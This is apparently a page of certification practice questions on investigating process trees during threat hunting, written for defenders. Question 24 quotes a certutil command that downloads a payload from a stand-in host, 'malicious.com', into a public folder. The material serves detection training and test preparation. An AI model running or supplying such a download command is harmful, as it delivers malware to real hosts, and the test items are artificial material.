
CrowdStrikeCertified Falcon Hunter (CCFH)
Domain 7Objective 5
7.5 Investigate a Process Tree CCFH Practice Questions (Page 5)
Part of the Hunting Methodology domain, which makes up ~17% of our current practice bank.
24questions here
5free pages
4concepts
Questions 21–24
- 21
During a hunt, you find a process tree where 'svchost.exe' is the parent of 'regsvr32.exe', which then spawned 'rundll32.exe'. The command line for regsvr32.exe includes a URL to an external site. The host is a domain controller with no internet access except through a proxy. Which action is most appropriate?
Select an answer first - 22
Which of the following command-line arguments would be considered suspicious when seen in a process tree?
Select an answer first - 23
In a process tree, you see that 'lsass.exe' is the parent of a process named 'cmd.exe'. This is highly unusual because lsass.exe is a system process that should not spawn child processes. What does this parent-child relationship most likely indicate?
Select an answer first - 24
You are analyzing a process tree where 'explorer.exe' is the parent of 'wscript.exe', which then spawned 'cmd.exe' with the command line 'cmd.exe /c certutil -urlcache -split -f http://malicious.com/payload.exe C:\Users\Public\payload.exe'. What is the most effective way to determine if this is malicious?
Select an answer first
Finished these 4 questions?
Review the revealed explanations, or continue through the curriculum.
No more pagesBack to CCFH
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by CrowdStrike. “CCFH” is a trademark of its owner, used for identification only.